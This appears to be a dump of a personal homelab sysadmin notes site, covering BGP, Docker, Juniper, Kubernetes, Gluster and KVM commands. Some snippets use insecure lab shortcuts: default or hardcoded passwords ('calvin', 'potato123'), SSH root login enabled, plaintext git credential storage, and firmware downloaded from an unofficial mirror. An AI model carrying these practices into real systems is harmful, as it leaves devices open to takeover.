    net add interface swp1 ip address 170.39.196.82/32\nnet add bgp autonomous-system 65000\nnet add bgp neighbor 170.39.196.81 remote-as 65000\nnet add bgp neighbor 170.39.196.81 password PASSWORD\nnet add bgp ipv4 unicast neighbor 170.39.196.81 next-hop-self\nnet add bgp redistribute connected\n\n\nnet add bgp neighbor 170.39.196.85 remote-as 65000\nnet add bgp neighbor 170.39.196.85 password PASSWORD\nnet add bgp ipv4 unicast neighbor 170.39.196.81 next-hop-self\nnet add bgp redistribute connected\n\nnet add bgp neighbor 170.39.196.84 remote-as 65000\nnet add bgp neighbor 170.39.196.84 password PASSWORD\nnet add bgp ipv4 unicast neighbor 170.39.196.81 next-hop-self\nnet add bgp redistribute connected\n\n\nnet add bgp neighbor 170.39.196.89 remote-as 65000\nnet add bgp neighbor 170.39.196.89 password PASSWORD\nnet add bgp ipv4 unicast neighbor 170.39.196.89 next-hop-self\nnet add bgp redistribute connected\n\n\nnet add bgp ipv4 unicast neighbor 170.39.196.84 next-hop-self\nnet add bgp ipv4 unicast neighbor 170.39.196.87 next-hop-self\n\n\nnet add ospf network 170.39.196.80/28 area 0\nnet add ospf default-information originate\nnet add ospf redistribute connected\nnet commit\n
    "},{"location":"docker/","title":"Docker","text":""},{"location":"docker/#stop-all-docker-containers-matching-pattern","title":"Stop all Docker containers matching pattern","text":"
    sudo docker ps | awk '/swift_/ {print $NF}' | xargs -I {} sudo docker stop {}\n
    "},{"location":"docker/#enter-namespace-of-the-container","title":"Enter Namespace of the container","text":"
    sudo docker inspect -f '{{.State.Pid}}' 744d1fc3fdff\n57752\n\n# Enter the Network namespace.\nsudo nsenter -t 57752 --net bash     \n
    "},{"location":"docker/#docker-install-bash-script","title":"Docker install bash script.","text":"
    #Install docker\n#!/bin/bash\n\nsudo apt-get install \\\n     apt-transport-https \\\n     ca-certificates \\\n     curl \\\n     gnupg2 \\\n     software-properties-common\n\ncurl -fsSL https://download.docker.com/linux/debian/gpg | sudo apt-key add -\n\nsudo add-apt-repository \\\n   \"deb [arch=amd64] https://download.docker.com/linux/debian \\\n   $(lsb_release -cs) \\\n   stable\"\n\nsudo apt-get update && apt-get install docker-ce\n
    "},{"location":"docker/#idrac-docker-vnc-image","title":"IDRAC Docker VNC image","text":"

    https://github.com/DomiStyle/docker-idrac6

    docker run -d -p 5800:5800 -p 5900:5900 -e IDRAC_HOST=IP_HERE -e IDRAC_USER=root -e IDRAC_PASSWORD=calvin domistyle/idrac6\n
    "},{"location":"docker/#radarr-docker","title":"Radarr Docker","text":"
    docker volume create radarr-config\n\nsudo docker run \\\n  -d \\\n  --name=radarr \\\n  -e PUID=109 \\\n  -e PGID=113 \\\n  -e TZ=America/Toronto \\\n  -p 7878:7878 \\\n  -v radarr-config:/config \\\n  -v /storage/media-gluster/movies/:/movies \\\n  -v /storage/media-gluster/downloads:/downloads \\\n  --restart unless-stopped \\\n  linuxserver/radarr\n
    "},{"location":"docker/#grafana-docker","title":"Grafana Docker","text":"
    sudo docker volume create grafana-storage\ndocker run \\\n  -d \\\n  -p 3000:3000 \\\n  --name=grafana \\\n  -v grafana-storage:/var/lib/grafana \\\n  grafana/grafana\n
    "},{"location":"docker/#couchpotato-docker","title":"Couchpotato Docker.","text":"
    docker volume create couchpotato-config\n\ndocker run \\\n    --name=couchpotato \\\n    -v couchpotato-config:/config \\\n    -v /storage/torrents_download:/downloads \\\n    -v /storage/media/movies:/movies \\\n    -e TZ=America/Toronto \\\n    -e PGID=113 -e PUID=109  \\\n    -p 5050:5050 \\\n    -d \\\n    linuxserver/couchpotato\n
    "},{"location":"docker/#watch-docker-stats","title":"Watch docker stats","text":"
    watch 'docker stats --no-stream --format \"table {{.Container}}\\t{{.Name}}\\t{{.CPUPerc}}\\t{{.MemUsage}}\"'\n
    "},{"location":"elasticsearch/","title":"Elasticsearch","text":""},{"location":"elasticsearch/#clean-indexes-old-than-x-days","title":"Clean indexes old than X days","text":"
    #! /bin/bash\n#Script to cleanup the logstash indices.\nDELETE_INDICES=$(/usr/bin/curl --silent -XGET 'localhost:9200/_cat/indices' | /bin/egrep -o logstash-20[0-9][0-9]\\.[0-9][0-9]\\.[0-9][0-9] | /bin/egrep -v \"$filter\" | /usr/bin/tr '\\n' ',')\nif [ $DELETE_INDICES ]\nthen\n/usr/bin/curl -XDELETE \"localhost:9200/$DELETE_INDICES\"\nfi\n
    "},{"location":"foreman/","title":"Foreman","text":""},{"location":"foreman/#remove-old-kernel-boot-files-sometimes-necessary-when-the-deployment-fails-with-a-kernel-not-foundmismatch-error","title":"Remove old kernel boot files (sometimes necessary when the deployment fails with a Kernel not found/mismatch error)","text":"
    ldumont@foreman:/srv/tftp/boot$ ls -alh\ntotal 189M\ndrwxr-xr-x 2 foreman-proxy root          4.0K Mar  9 12:53 .\ndrwxr-xr-x 8 root          nogroup       4.0K Dec 16  2018 ..\n-rw-r--r-- 1 foreman-proxy foreman-proxy  53M Sep  6  2019 centos-mirror-qVbSBrznIWMc-initrd.img\n-rw-r--r-- 1 foreman-proxy foreman-proxy 6.5M Aug  7  2019 centos-mirror-qVbSBrznIWMc-vmlinuz\n-rw-r--r-- 1 foreman-proxy foreman-proxy  30M Feb  1 09:55 debian-mirror-wXTzvPQ8AfC3-initrd.gz\n-rw-r--r-- 1 foreman-proxy foreman-proxy 5.1M Feb  1 09:55 debian-mirror-wXTzvPQ8AfC3-linux\n-rw-r--r-- 1 foreman-proxy foreman-proxy  36M Apr 20  2016 ubuntu-16.04-16.04.5-x86_64-initrd.gz\n-rw-r--r-- 1 foreman-proxy foreman-proxy 6.7M Apr 20  2016 ubuntu-16.04-16.04.5-x86_64-linux\n-rw-r--r-- 1 foreman-proxy foreman-proxy  45M Apr 25  2018 ubuntu-mirror-WKCIULkETfqj-initrd.gz\n-rw-r--r-- 1 foreman-proxy foreman-proxy 7.9M Apr 25  2018 ubuntu-mirror-WKCIULkETfqj-linux\n\n# Remove the all files related to a single OS.\nsudo rm -f debian-mirror*\n
    "},{"location":"foreman/#update-foreman","title":"Update Foreman","text":"
    #https://theforeman.org/manuals/1.22/index.html#3.6Upgrade\n\nsystemctl apache2 stop\n# Upgrade .list file from /etc/apt/sources.list.d/foreman.list\napt-get update\napt-get --only-upgrade install ruby\\* foreman\\*\nforeman-rake db:migrate\nforeman-rake db:seed\nforeman-rake tmp:cache:clear\nforeman-rake db:sessions:clear\n\n# Test Foreman upgrade\nforeman-installer --noop --dont-save-answers --verbose\n# Start Foreman installer upgrade.\nforeman-installer\nservice apache2 restart\n
    "},{"location":"foreman/#fix-failing-gem-packages","title":"Fix failing GEM packages.","text":"
    # As root\nsu foreman\n# cd to home\ncd\nmv Gemfile.lock Gemfile.lock.backup\n/usr/bin/foreman-ruby /usr/bin/bundle update\n/usr/bin/foreman-ruby /usr/bin/bundle install\n
    "},{"location":"foreman/#remove-plugin","title":"Remove plugin","text":"
    # Remove the gem file for your plugin.\n# rm ~foreman/bundler.d/Gemfile.local.rb\n# ~Gemfile.local.rb\n\n# Reinstall all gems without the old one\n/usr/bin/foreman-ruby /usr/bin/bundle install\n\n# Restart Foreman\ntouch ~foreman/tmp/restart.txt\n
    "},{"location":"frr/","title":"FRR","text":""},{"location":"frr/#enter-frr-shell","title":"Enter FRR shell","text":"
    sudo vtyshell\n
    "},{"location":"frr/#show-bgp-neigbors","title":"Show bgp neigbors","text":"
    show bgp neighbors\nshow bgp summary\n
    "},{"location":"frr/#show-information-from-neighbors","title":"Show information from neighbors","text":"
    show bgp vrf all ipv4 neighbors x.x.x.x advertised-routes\nshow bgp vrf all ipv4 neighbors x.x.x.x received-routes \n
    "},{"location":"frr/#frr-pfsense","title":"FRR pfsense","text":"
    show bgp ipv4 unicast neighbors 170.39.196.221 advertised-routes\nshow bgp summary\n
    "},{"location":"git/","title":"Git","text":""},{"location":"git/#git-stuff","title":"Git Stuff","text":""},{"location":"git/#easy-gitsh","title":"easy-git.sh","text":"
    #!/bin/bash\nDIRECTORY=.git\nif [ -z \"$1\" ]; then\n    echo \"You savage, you need a comment for a commit!\"\n    exit\nfi\n\nif [ -d \"$DIRECTORY\" ]; then\n    git add .\n    git commit -S -m \"$1\"\n    git push origin master\nelse\n    echo \"This is NOT a git repo\"\nfi\n
    "},{"location":"git/#credentials","title":"Credentials","text":"
    git config --global credential.helper store\ngit config --global credential.helper 'cache --timeout=3600' \n
    "},{"location":"gluster/","title":"Gluster","text":""},{"location":"gluster/#troubleshooting","title":"Troubleshooting","text":"
    gluster volume info\n
    sudo gluster peer probe kube2\n
    sudo gluster peer status\n
    gluster volume status all clients\n
    sudo gluster volume create gluster-vol-1 replica 2 transport tcp kube1:/gluster/gluster-vol-1 kube2:/gluster/gluster-vol-1\n
    "},{"location":"gluster/#no-replicate-single-server","title":"No replicate - single server.","text":"
    gluster volume create $VOLUME_NAME $IPADDRESS_OR_DOMAINNAME:/$ROOT_MOUNT_POINT/$SUBFOLDER\ngluster volume start $VOLUME_NAME\n
    "},{"location":"gluster/#mount-a-gluster-share","title":"Mount a gluster share.","text":"
    mount -t glusterfs $GLUSTER_SERVER_IP:$SHARE_NAME $LOCAL_PATH\n
    sudo gluster volume start gluster-vol-1\n
    "},{"location":"gluster/#enable-nfs-on-a-gluster-non-ganesha-volume","title":"Enable nfs on a gluster (non-ganesha) volume","text":"
    gluster volume set media nfs\ngluster volume set media nfs.disable off\ngluster volume set openstack-storage nfs.disable off\n
    "},{"location":"gluster/#disable-ctime-for-rancher-to-be-able-to-mount-gluster-volumes","title":"Disable ctime for Rancher to be able to mount Gluster volumes.","text":"
    root@gluster01:~# history | grep ctime\n  481  gluster volume set kube_vol ctime off\n  498  gluster volume set kube_vol ctime on\n  499  gluster volume set kube_vol ctime off\n  501  history | grep ctime\n
    "},{"location":"iperf/","title":"iPerf","text":"

    UDP TEST (DDOS like test where you send traffic to the other endpoint without any policing. iPerf3 does not allow you to send traffic directly for UDP. It needs to \"connect\" to an iPerf3 endpoint, even for UDP.

    ./iperf -c TARGET_IP --udp --interval 2 --bandwidth 9m\n

    IPERF SERVER TCP

    ./iperf --server\n

    IPERF CLIENT TCP UPLOAD AND THEN DOWNLOAD

    ./iperf --client IPERF_SERVER --tradeoff --window 1M\n

    IPERF CLIENT TCP UPLOAD AND DOWNLOAD AT THE SAME TIME

    ./iperf --client IPERF_SERVER --dualtest --window 1M\n
    "},{"location":"iperf/#iperf-systemd-file","title":"Iperf Systemd file","text":"
    [ec2-user@perf-server ~]$ sudo cat /etc/systemd/system/iperf3.service \n# /etc/systemd/system/iperf.service\n[Unit]\nDescription=iperf server\nAfter=syslog.target network.target auditd.service\n\n[Service]\nExecStart=/usr/bin/iperf3 --log /var/log/iperf/iperf-server.log --server\n\n[Install]\nWantedBy=multi-user.target\n
    "},{"location":"iscsi/","title":"ISCSI","text":""},{"location":"iscsi/#discover-login-targets","title":"Discover login targets","text":"
    iscsiadm --mode discoverydb -t sendtargets --portal $ISCSI_SERVER_IP --discover -d 7\n
    "},{"location":"iscsi/#show-iscsi-stats","title":"Show iscsi stats","text":"
    sudo iscsiadm --mode session --stats\n
    "},{"location":"juniper/","title":"Juniper","text":""},{"location":"juniper/#useful-commands","title":"Useful commands.","text":"
    # Show the current configuration.\nshow configuration\n\n#Show the logs of the device.\nshow log messsage\n\n#Show but compare\nshow | compare\n\n#Show but display as a line configuration and not XML.\nshow | display set\n\n#Show interface list and status\nshow interfaces terse\n\n#Show current hardware\nshow chassis hardware\n\n#Show global routing table\nshow route\n\nshow interface | incl (proto|Desc)\n\n#Show processus using memory and general system performance stats\nshow system processes summary\n\n#Check CPU usage\nshow chassis routing-engine\nshow system process extensive | no-more\n
    "},{"location":"juniper/#delete-interface-config","title":"Delete interface config","text":"
    delete interface ge-0/0/4\ndelete interface ge-0/0/5\ndelete interface ge-0/0/7\ndelete interface ae6\n
    "},{"location":"juniper/#syslog-configuration","title":"Syslog configuration.","text":"
    set system syslog user * any emergency\nset system syslog host 10.0.99.28 any any\nset system syslog host 10.0.99.28 port 1514\nset system syslog file messages any notice\nset system syslog file messages authorization info\nset system syslog file interactive-commands interactive-commands any\n
    "},{"location":"juniper/#radius-configuration","title":"Radius configuration.","text":"
    edit\nset system radius-server $RADIUS_SERVER_IP_HERE source-address $SWITCH_IP_HERE\nset system radius-server $RADIUS_SERVER_IP_HERE secret $PASSWORD_HERE\n\nset system authentication-order [ radius password ]\n\n#Create user profiles based on FreeIPA group.\n\nedit system login\nset user HELPDESK class read-only\nset user OPERATOR class super-user\nset user remote full-name \"default remote access user template\"\nset user remote class read-only\n
    "},{"location":"juniper/#create-a-vlan","title":"Create a vlan","text":"
    set vlans OSTACK-TEST-1 vlan-id 70\n
    "},{"location":"juniper/#create-a-l3-vlan-interface","title":"Create a L3 VLAN interface.","text":"
    set vlans MGMT vlan-id 69\nset interfaces ge-0/0/23 unit 0 family ethernet-switching port-mode trunk 666 vlan members 69\nset interfaces vlan unit 69 family inet address 10.10.69.14/24\nset vlans MGMT l3-interface vlan.69\n
    "},{"location":"juniper/#enable-ssh-with-root-login","title":"Enable SSH with root login.","text":"
    set system services ssh root-login allow\n
    "},{"location":"juniper/#create-a-default-route","title":"Create a default route.","text":"
    set routing-options static route 0.0.0.0/0 next-hop 10.10.69.1\n
    "},{"location":"juniper/#add-a-nameserver-for-dns-resolution","title":"Add a nameserver for DNS resolution.","text":"
    edit system name-server 8.8.8.8 \n
    "},{"location":"juniper/#upgrade-the-junos-image","title":"Upgrade the JunOS image.","text":"
    request system software add http://web.weba.ru/pub/500G_3/Firmware/Juniper/12.3/domestic/jinstall-ex-2200-12.3R5.7-domestic-signed.tgz\n\nfile copy http://web.weba.ru/pub/500G_3/Firmware/Juniper/12.3/domestic/jinstall-ex-2200-12.3R5.7-domestic-signed.tgz  /var/tmp/\n\nrequest system software add /var/tmp/jinstall-ex-2200-12.3R5.7-domestic-signed.tgz reboot\n
    "},{"location":"juniper/#repair-a-junos-partition-that-rebooted-from-the-backup-partition","title":"Repair a JunOS partition that rebooted from the backup partition.","text":"
    ***********************************************************************\n**                                                                   **\n**  WARNING: THIS DEVICE HAS BOOTED FROM THE BACKUP JUNOS IMAGE      **\n**                                                                   **\n**  It is possible that the primary copy of JUNOS failed to boot up  **\n**  properly, and so this device has booted from the backup copy.    **\n**                                                                   **\n**  Please re-install JUNOS to recover the primary copy in case      **\n**  it has been corrupted and if auto-snapshot feature is not        **\n**  enabled.                                                         **\n**                                                                   **\n***********************************************************************\n
    show chassis alarms\nshow system storage partitions\nrequest system snapshot media internal slice alternate\nshow system snapshot media internal\nrequest system reboot slice alternate media internal\n
    "},{"location":"juniper/#create-an-admin-user","title":"Create an admin user.","text":"
    set system login user cmaker authentication plain-text-password\nset system login user cmaker class super-user\n
    "},{"location":"juniper/#add-a-ssh-key-to-a-local-user-for-password-less-auth","title":"Add a SSH key to a local user for password-less auth.","text":"
    set system login user prox-exporter-juniper authentication ssh-rsa \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDJZTRPs8WXsD1yNmWd69/zHNDf4ApvTXDjfk0rxEjgiDsOgWvID0Q8ZH0tFzSV9L0W7a/9jG0POuJyiGYF6M4X2QdEPSZ2CgxRm7GL4A1SJ4xbnCYny2k4L8C7UrDrvqThv6/FyyJopHCPp7S3j0iAI6c+Gtv59sbUvdilWC4Y5LX0ho+yocMaGvTOk+l5aQRU9eWmZsD0/3D0V99iBnm70rlEeEIr1Oe+M+y/Q/0vmBVdC75COCxu84PnLvqPH2yOf3j581wgIVncKbApB0b9ApTbCE94jNljtwM4uGM9qICOf0BwbrDfFT1L1n5ZQx7BZnD9410wv2jTYXTPUJV1\"\nset system login user prox-exporter-juniper class super-user\n
    "},{"location":"juniper/#password-recovery","title":"Password recovery.","text":"
    Boot normally.\n\nPrompt : Hit [Enter] to boot immediately, or space bar for command prompt.\n\npress space during the boot process\n\nType :\nloader> boot -s\n\nType : \nEnter full pathname of shell or 'recovery' for root password recovery or RETURN for /bin/sh: recovery\n
    "},{"location":"juniper/#configure-snmp-with-contact-and-location-strings","title":"Configure SNMP with contact and location strings.","text":"
    set snmp name \u201ccmaker-ex2200\u201d description \u201ccmaker-ex2200\u201d\nset snmp location \u201c9880 Clark\u201d\nset snmp contact \"laurentfdumont@gmail.com\"\nset snmp community cmaker authorization read-only\n
    "},{"location":"juniper/#aggregated-interfaces-ae","title":"Aggregated interfaces (AE)","text":"
    #Increase the number of AE interfaces.\nset chassis aggregated-devicesethernetdevice-count4 \n\n\n#Create the AE interface and the switching options.\nset interfaces ae3 description AE-LACP-ULTRABACON-PROXMOX\nset interfaces ae3 aggregated-ether-options lacp active\nset interfaces ae3 unit 0 family ethernet-switching port-mode trunk\nset interfaces ae3 unit 0 family ethernet-switching vlan members 69\nset interfaces ae3 unit 0 family ethernet-switching vlan members 99-100\nset interfaces ae3 unit 0 family ethernet-switching vlan members 210\nset interfaces ae3 unit 0 family ethernet-switching vlan members 2001\nset interfaces ae3 unit 0 family ethernet-switching native-vlan-id 666\n\ncmaker@ex2200-cmaker> show configuration interfaces ge-0/0/17 | display set \nset interfaces ge-0/0/17 description LACP-ULTRABACON-PROXMOX\nset interfaces ge-0/0/17 ether-options 802.3ad ae3\n
    "},{"location":"kolla/","title":"Kolla","text":""},{"location":"kolla/#deploying-kolla","title":"Deploying Kolla","text":"
    kolla-ansible -i ./multinode bootstrap-servers\nkolla-ansible -i ./multinode prechecks\nkolla-ansible -i ./multinode deploy\n
    "},{"location":"kubernetes/","title":"Kubernetes","text":""},{"location":"kubernetes/#pod-configuration","title":"Pod configuration","text":""},{"location":"kubernetes/#get-pods-running-on-specific-node","title":"Get pods running on specific node","text":"
    #Get the node names\nkubectl get nodes                                                                                                                                                                                                                                                                         Tue 14 Apr 2020\nNAME          STATUS   ROLES                      AGE    VERSION\n10.10.99.58   Ready    controlplane,etcd,worker   138d   v1.16.3\n10.10.99.59   Ready    controlplane,etcd,worker   138d   v1.16.3\n10.10.99.60   Ready    controlplane,etcd,worker   138d   v1.16.3\n10.10.99.61   Ready    controlplane,etcd,worker   138d   v1.16.3\n\n#Get all the pods on that node\nkubectl get pods --all-namespaces -o wide --field-selector spec.nodeName=10.10.99.58\n\nkubectl get pods --all-namespaces -o wide --field-selector spec.nodeName=10.10.99.58                                                                                                                                                                                              353ms \ue0b3 Tue 14 Apr 2020\nNAMESPACE              NAME                                                       READY   STATUS      RESTARTS   AGE    IP            NODE          NOMINATED NODE   READINESS GATES\ncattle-prometheus      exporter-node-cluster-monitoring-8zzvj                     1/1     Running     2          36d    10.10.99.58   10.10.99.58   <none>           <none>\ncattle-prometheus      prometheus-operator-monitoring-operator-7985c7f758-9rgf6   1/1     Running     3          36d    10.42.2.112   10.10.99.58   <none>           <none>\ncattle-system          cattle-node-agent-6fprv                                    1/1     Running     5          137d   10.10.99.58   10.10.99.58   <none>           <none>\ncattle-system          rancher-c88c6458c-ggnww                                    1/1     Running     22         138d   10.42.2.103   10.10.99.58   <none>           <none>\ncert-manager           
cert-manager-584cbff946-mcds8                              1/1     Running     13         138d   10.42.2.107   10.10.99.58   <none>           <none>\ncert-manager           cert-manager-cainjector-7c556d76f-s48js                    1/1     Running     37         115d   10.42.2.111   10.10.99.58   <none>           <none>\ncmaker-lab-namespace   gitlab-migrations.1-gwfl9                                  0/1     Completed   0          36d    10.42.2.82    10.10.99.58   <none>           <none>\ncmaker-lab-namespace   gitlab-minio-67df89d968-lpg9b                              1/1     Running     2          36d    10.42.2.116   10.10.99.58   <none>           <none>\ncmaker-lab-namespace   gitlab-nginx-ingress-controller-5655b8bf66-mtvdl           1/1     Running     2          36d    10.42.2.109   10.10.99.58   <none>           <none>\ncmaker-lab-namespace   gitlab-nginx-ingress-default-backend-677f7b7778-7dj7q      1/1     Running     2          36d    10.42.2.110   10.10.99.58   <none>           <none>\ncmaker-lab-namespace   gitlab-registry-647ddd89c-qrdhj                            1/1     Running     2          36d    10.42.2.115   10.10.99.58   <none>           <none>\nfoldingathome          fah-workers-3                                              1/1     Running     0          9d     10.42.2.125   10.10.99.58   <none>           <none>\ningress-nginx          default-http-backend-67cf578fc4-6ffns                      1/1     Running     4          138d   10.42.2.104   10.10.99.58   <none>           <none>\ningress-nginx          nginx-ingress-controller-tdfv8                             1/1     Running     4          138d   10.10.99.58   10.10.99.58   <none>           <none>\nistio-system           istio-pilot-56866b7c5f-5pfj4                               2/2     Running     6          73d    10.42.2.106   10.10.99.58   <none>           <none>\nistio-system           istio-sidecar-injector-8565bfc879-85p4n                    1/1     Running     4          73d    
10.42.2.102   10.10.99.58   <none>           <none>\nistio-system           istio-tracing-79fbf487df-g6xml                             2/2     Running     7          73d    10.42.2.108   10.10.99.58   <none>           <none>\nkube-system            canal-85lqk                                                2/2     Running     8          138d   10.10.99.58   10.10.99.58   <none>           <none>\nkube-system            coredns-5c59fd465f-k6ks7                                   1/1     Running     4          138d   10.42.2.105   10.10.99.58   <none>           <none>\nkube-system            rke-coredns-addon-deploy-job-p97pl                         0/1     Completed   0          138d   10.10.99.58   10.10.99.58   <none>           <none>\nkube-system            rke-ingress-controller-deploy-job-r2bcz                    0/1     Completed   0          138d   10.10.99.58   10.10.99.58   <none>           <none>\nkube-system            rke-metrics-addon-deploy-job-r2dmg                         0/1     Completed   0          138d   10.10.99.58   10.10.99.58   <none>           <none>\nkube-system            rke-network-plugin-deploy-job-ghlhz                        0/1     Completed   0          138d   10.10.99.58   10.10.99.58   <none>           <none>\nmetallb-system         controller-65895b47d4-stk74                                1/1     Running     2          35d    10.42.2.113   10.10.99.58   <none>           <none>\nmetallb-system         speaker-pnc7d                                              1/1     Running     2          35d    10.10.99.58   10.10.99.58   <none>           <none>\n
    "},{"location":"kubernetes/#config-map","title":"Config-map","text":"
    kubectl create configmap ara-config --namespace cmaker-lab-namespace --from-file=config-maps/settings.yaml   \nkubectl get configmap --namespace cmaker-lab-namespace\n
    "},{"location":"kubernetes/#create-helm-charts","title":"Create helm charts","text":"
    helm install ara-postgres --namespace cmaker-lab-namespace  ./postgresql/ --values postgresql/values.yaml\nhelm install ara-ansible --namespace cmaker-lab-namespace  ./helm-ansible-ara/ --values helm-ansible-ara/values.yaml\n
    "},{"location":"kubernetes/#delete-helm-charts","title":"Delete helm charts","text":"
    helm delete ara-ansible --namespace cmaker-lab-namespace\nhelm delete ara-postgres --namespace cmaker-lab-namespace\n
    "},{"location":"kubernetes/#debugging","title":"Debugging","text":""},{"location":"kubernetes/#delete-pv","title":"Delete PV","text":"
    ldumont@docker01:~$ kubectl delete pv test --grace-period=0 --force^C\nldumont@docker01:~$ kubectl patch pv test -p '{\"metadata\": {\"finalizers\": null}}'\n
    "},{"location":"kubernetes/#storage","title":"Storage","text":""},{"location":"kubernetes/#create-gluster-endpoint","title":"Create Gluster Endpoint.","text":"

    gluster-endpoints.yaml

    ---\nkind: Endpoints\napiVersion: v1\nmetadata:\n name: glusterfs-cluster\nsubsets:\n- addresses:\n - ip: 9.111.249.161\n ports:\n - port: 666\n

    gluster-service.yaml

    apiVersion: v1\nkind: Service\nmetadata:\n  name: glusterfs-cluster\nspec:\n  ports:\n  - port: 666\n
    "},{"location":"kvm/","title":"KVM","text":""},{"location":"kvm/#customize-qcow2-images","title":"Customize qcow2 images","text":"

    Download the .img first

    virt-customize --install ethtool,traceroute,iputils-ping,socat,dnsutils,tcpdump,tshark,iperf,iperf3,mtr,fping,lldpd --root-password password:potato123 -a 22.04-server.img\n

    Sysprep is necessary to remove any static information from a VM (hostname, ssh host keys, interfaces MAC/config). Similar to Windows sysprep.

    In this case, we do not remove the ssh-hostkeys because of possible issues with ssh access if the keys are not re-generated.

    virt-sysprep --operations defaults,-ssh-hostkeys -a 22.04-server.img\n
    "},{"location":"kvm/#using-uvtools-for-ubuntu-minimal-images","title":"Using uvtools for Ubuntu minimal images","text":"

    Download the images

    uvt-kvm  uvt-simplestreams-libvirt sync --source https://cloud-images.ubuntu.com/minimal/daily/ release=bionic arch=amd64\n
    uvt-kvm create --packages iperf,iperf3,dnsutils,tcpdump,--disk 5 --password potato123 --memory 2048 --cpu 2 myminimalvm-jammy release=jammy arch=amd64 \"label=minimal daily\"\n

    Download images are in /var/lib/uvtool/libvirt/images/

    "},{"location":"kvm/#get-list-of-os-variants-valid-for-kvm","title":"Get list of os-variants valid for KVM","text":"
    ldumont@kvm01:~$ osinfo-query os | grep -i centos\ncentos6.0            | CentOS 6.0                                         | 6.0      | http://centos.org/centos/6.0            \ncentos6.1            | CentOS 6.1                                         | 6.1      | http://centos.org/centos/6.1            \ncentos6.10           | CentOS 6.10                                        | 6.10     | http://centos.org/centos/6.10           \ncentos6.2            | CentOS 6.2                                         | 6.2      | http://centos.org/centos/6.2            \ncentos6.3            | CentOS 6.3                                         | 6.3      | http://centos.org/centos/6.3            \ncentos6.4            | CentOS 6.4                                         | 6.4      | http://centos.org/centos/6.4            \ncentos6.5            | CentOS 6.5                                         | 6.5      | http://centos.org/centos/6.5            \ncentos6.6            | CentOS 6.6                                         | 6.6      | http://centos.org/centos/6.6            \ncentos6.7            | CentOS 6.7                                         | 6.7      | http://centos.org/centos/6.7            \ncentos6.8            | CentOS 6.8                                         | 6.8      | http://centos.org/centos/6.8            \ncentos6.9            | CentOS 6.9                                         | 6.9      | http://centos.org/centos/6.9            \ncentos7.0            | CentOS 7.0                                         | 7.0      | http://centos.org/centos/7.0          \n
    "},{"location":"kvm/#create-pxe-only-virsh-domain","title":"Create PXE only virsh domain","text":"
    sudo virt-install --name test-ubuntu \\\n--ram 4096 --vcpus 2 \\\n--disk path=/var/lib/libvirt/images/test-ubuntu,bus=virtio,size=50 \\\n--noautoconsole --graphics vnc \\\n--cdrom=/var/lib/libvirt/boot/mini.iso \\\n--network bridge:br0 \\\n--network bridge:br1 \\\n--os-variant ubuntu18.04\n\nsudo virt-install --name ooo-director \\\n--ram 18432 --vcpus 8 \\\n--disk path=/var/lib/libvirt/images/ooo-director,bus=virtio,size=50 \\\n--noautoconsole --graphics vnc \\\n--cdrom=/var/lib/libvirt/boot/CentOS-7-x86_64-Minimal-1908.iso \\\n--network bridge:br1 \\\n--network bridge:br0 \\\n--os-variant centos7.0\n\nsudo virt-install --name ooo-controller001 \\\n--ram 9216 --vcpus 4 \\\n--disk path=/var/lib/libvirt/images/ooo-controller001.qcow2,bus=virtio,size=50 \\\n--pxe --noautoconsole --graphics vnc \\\n--network bridge:br1 \\\n--network bridge:br0 \\\n--os-variant centos7.0\n\nsudo virt-install --name ooo-controller002 \\\n--ram 9216 --vcpus 4 \\\n--disk path=/var/lib/libvirt/images/ooo-controller002.qcow2,bus=virtio,size=50 \\\n--pxe --noautoconsole --graphics vnc \\\n--network bridge:br1 \\\n--network bridge:br0 \\\n--os-variant centos7.0\n\nsudo virt-install --name ooo-controller003 \\\n--ram 9216 --vcpus 4 \\\n--disk path=/var/lib/libvirt/images/ooo-controller003.qcow2,bus=virtio,size=50 \\  \n--pxe --noautoconsole --graphics vnc \\\n--network bridge:br1 \\\n--network bridge:br0 \\\n--os-variant centos7.0\n\nsudo virt-install --name ooo-compute001 \\\n--ram 9216 --vcpus 4 \\\n--disk path=/var/lib/libvirt/images/ooo-compute001,bus=virtio,size=50 \\\n--pxe --noautoconsole --graphics vnc \\\n--network bridge:br1 \\\n--network bridge:br0 \\\n--os-variant centos7.0\n
    "},{"location":"kvm/#bridge-physical-interface-for-vm-access","title":"Bridge physical interface for VM access.","text":"
    #Install the bridge-utils package\napt-get install bridge-utils\n\n#Create the two bridges\nbrctl addbr br1\nbrctl addbr br2\n
    # In /etc/network/interfaces\n# Use old eth0 config for br0, plus bridge stuff\n\n#loopback\nauto lo\niface lo inet loopback\n\nauto br0\nauto br1\n\niface br0 inet static\n    address 10.10.99.62\n    gateway 10.10.99.1\n    netmask 255.255.255.0\n    dns-nameservers 10.10.99.1 \n    dns-search cmaker.studio\n    bridge_ports    ens18\n    bridge_stp      off\n    bridge_maxwait  0\n    bridge_fd       0\n\niface br1 inet manual\n    bridge_ports    ens19\n    bridge_stp      off\n    bridge_maxwait  0\n    bridge_fd       0\n
    "},{"location":"kvm/#show-vnc-information-port-is-590vncdisplay_index","title":"Show VNC information - port is 590$(VNCDISPLAY_INDEX)","text":"
    root@kvm01:~# virsh vncdisplay ooo-controller001\n:0\n\nroot@kvm01:~# virsh vncdisplay ooo-controller002\n:1\n\nroot@kvm01:~# virsh vncdisplay ooo-controller003\n:2\n\nroot@kvm01:~# netstat -punta | grep 590\ntcp        0      0 0.0.0.0:5902            0.0.0.0:*               LISTEN      2691/qemu-system-x8 \ntcp        0      0 0.0.0.0:5900            0.0.0.0:*               LISTEN      2559/qemu-system-x8 \ntcp        0      0 0.0.0.0:5901            0.0.0.0:*               LISTEN      2649/qemu-system-x8 \n
    "},{"location":"kvm/#vbmc","title":"VBMC","text":""},{"location":"kvm/#installation","title":"Installation","text":"
    yum install gcc python-devel\npip install --upgrade setuptools\npip install virtualbmc\n
    vbmc add ooo-controller001 --port 16001 --username test --password secret\nvbmc add ooo-controller002 --port 16002 --username test --password secret\nvbmc add ooo-controller003 --port 16003 --username test --password secret\nvbmc add ooo-compute001 --port 16004 --username test --password secret\n\nvbmc start ooo-controller001\nvbmc start ooo-controller002\nvbmc start ooo-controller003\nvbmc start ooo-compute001\n
    "},{"location":"kvm/#enable-serial-connection-over-virsh","title":"Enable serial connection over virsh","text":"
    #FROM THE GUEST VM\nsudo systemctl enable serial-getty@ttyS0.service\nsudo systemctl start serial-getty@ttyS0.service\n
    #FROM THE KVM HOST\nsudo virsh console $DOMAIN_NAME\n#OR GET THE DOMAIN ID from `virsh list`\nsudo virsh console $KVM_DOMAIN_ID\n
